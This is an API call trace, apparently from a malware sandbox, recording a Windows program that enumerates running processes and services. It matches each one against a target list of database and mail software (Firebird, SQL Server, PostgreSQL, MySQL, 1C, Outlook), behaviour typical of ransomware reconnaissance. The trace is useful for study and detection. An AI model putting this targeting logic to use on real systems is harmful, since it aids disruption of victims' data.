	[0148.308] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0148.308] lstrlenW (lpString="taskhost.exe") returned 12
	[0148.308] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0148.308] lstrlenW (lpString="userinit.exe") returned 12
	[0148.308] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0148.309] lstrlenW (lpString="dwm.exe") returned 7
	[0148.309] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0148.309] lstrlenW (lpString="explorer.exe") returned 12
	[0148.309] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0148.309] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0148.309] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0148.309] lstrlenW (lpString="reader_sl.exe") returned 13
	[0148.310] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0148.310] CloseHandle (hObject=0x38c) returned 1
	[0148.310] Sleep (dwMilliseconds=0x1f4) 
	[0148.898] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb6172f0
	[0149.291] EnumServicesStatusExW (in: hSCManager=0xb6172f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0149.309] GetLastError () returned 0xea
	[0149.309] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0149.309] EnumServicesStatusExW (in: hSCManager=0xb6172f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0149.331] CloseServiceHandle (hSCObject=0xb6172f0) returned 1
	[0149.331] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0149.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0149.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0149.331] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0149.331] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0149.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0149.331] lstrlenW (lpString="AudioSrv") returned 8
	[0149.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0149.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0149.331] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0149.332] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0149.332] lstrlenW (lpString="BFE") returned 3
	[0149.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0149.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0149.332] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0149.332] lstrlenW (lpString="CryptSvc") returned 8
	[0149.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0149.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0149.332] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0149.332] lstrlenW (lpString="CscService") returned 10
	[0149.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0149.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0149.332] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0149.332] lstrlenW (lpString="DcomLaunch") returned 10
	[0149.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0149.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0149.332] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0149.332] lstrlenW (lpString="Dhcp") returned 4
	[0149.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0149.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0149.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0149.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0149.333] lstrlenW (lpString="Dnscache") returned 8
	[0149.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0149.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0149.333] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0149.333] lstrlenW (lpString="DPS") returned 3
	[0149.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0149.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0149.333] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0149.333] lstrlenW (lpString="eventlog") returned 8
	[0149.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0149.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0149.333] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0149.333] lstrlenW (lpString="EventSystem") returned 11
	[0149.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0149.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0149.333] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0149.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0149.333] lstrlenW (lpString="gpsvc") returned 5
	[0149.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0149.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0149.333] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0149.333] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0149.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0149.334] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0149.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0149.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0149.334] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0149.334] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0149.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0149.334] lstrlenW (lpString="lmhosts") returned 7
	[0149.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0149.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0149.334] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0149.334] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0149.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0149.334] lstrlenW (lpString="MMCSS") returned 5
	[0149.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0149.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0149.334] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0149.334] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0149.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0149.334] lstrlenW (lpString="MpsSvc") returned 6
	[0149.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0149.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0149.334] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0149.334] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0149.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0149.334] lstrlenW (lpString="NlaSvc") returned 6
	[0149.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0149.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0149.334] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0149.334] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0149.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0149.335] lstrlenW (lpString="nsi") returned 3
	[0149.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0149.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0149.335] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0149.335] lstrlenW (lpString="PcaSvc") returned 6
	[0149.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0149.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0149.335] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0149.335] lstrlenW (lpString="PlugPlay") returned 8
	[0149.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0149.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0149.335] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0149.335] lstrlenW (lpString="Power") returned 5
	[0149.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0149.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0149.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0149.335] lstrlenW (lpString="ProfSvc") returned 7
	[0149.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0149.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0149.335] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0149.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0149.335] lstrlenW (lpString="RpcEptMapper") returned 12
	[0149.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0149.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0149.336] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0149.336] lstrlenW (lpString="RpcSs") returned 5
	[0149.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0149.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0149.336] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0149.336] lstrlenW (lpString="SamSs") returned 5
	[0149.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0149.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0149.336] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0149.336] lstrlenW (lpString="Schedule") returned 8
	[0149.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0149.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0149.336] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0149.336] lstrlenW (lpString="SENS") returned 4
	[0149.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0149.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0149.336] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0149.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0149.336] lstrlenW (lpString="ShellHWDetection") returned 16
	[0149.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0149.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0149.337] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0149.337] lstrlenW (lpString="Spooler") returned 7
	[0149.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0149.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0149.337] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0149.337] lstrlenW (lpString="Themes") returned 6
	[0149.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0149.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0149.337] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0149.337] lstrlenW (lpString="UxSms") returned 5
	[0149.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0149.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0149.337] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0149.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0149.337] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0149.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac
	[0149.339] Process32FirstW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0149.339] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0149.339] lstrlenW (lpString="System") returned 6
	[0149.339] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0149.339] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0149.340] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0149.340] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0149.340] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0149.340] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0149.340] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0149.340] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0149.340] lstrlenW (lpString="smss.exe") returned 8
	[0149.340] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0149.340] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0149.340] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0149.340] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0149.340] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0149.340] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0149.340] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0149.340] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0149.340] lstrlenW (lpString="csrss.exe") returned 9
	[0149.341] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0149.341] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0149.341] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0149.341] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0149.341] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0149.341] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0149.341] lstrlenW (lpString="wininit.exe") returned 11
	[0149.341] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0149.341] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0149.341] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0149.342] lstrlenW (lpString="csrss.exe") returned 9
	[0149.342] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0149.342] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0149.342] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0149.342] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0149.342] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0149.342] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0149.342] lstrlenW (lpString="winlogon.exe") returned 12
	[0149.342] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0149.342] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0149.342] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0149.343] lstrlenW (lpString="services.exe") returned 12
	[0149.343] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0149.343] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0149.343] lstrlenW (lpString="lsass.exe") returned 9
	[0149.343] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0149.343] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0149.343] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0149.343] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
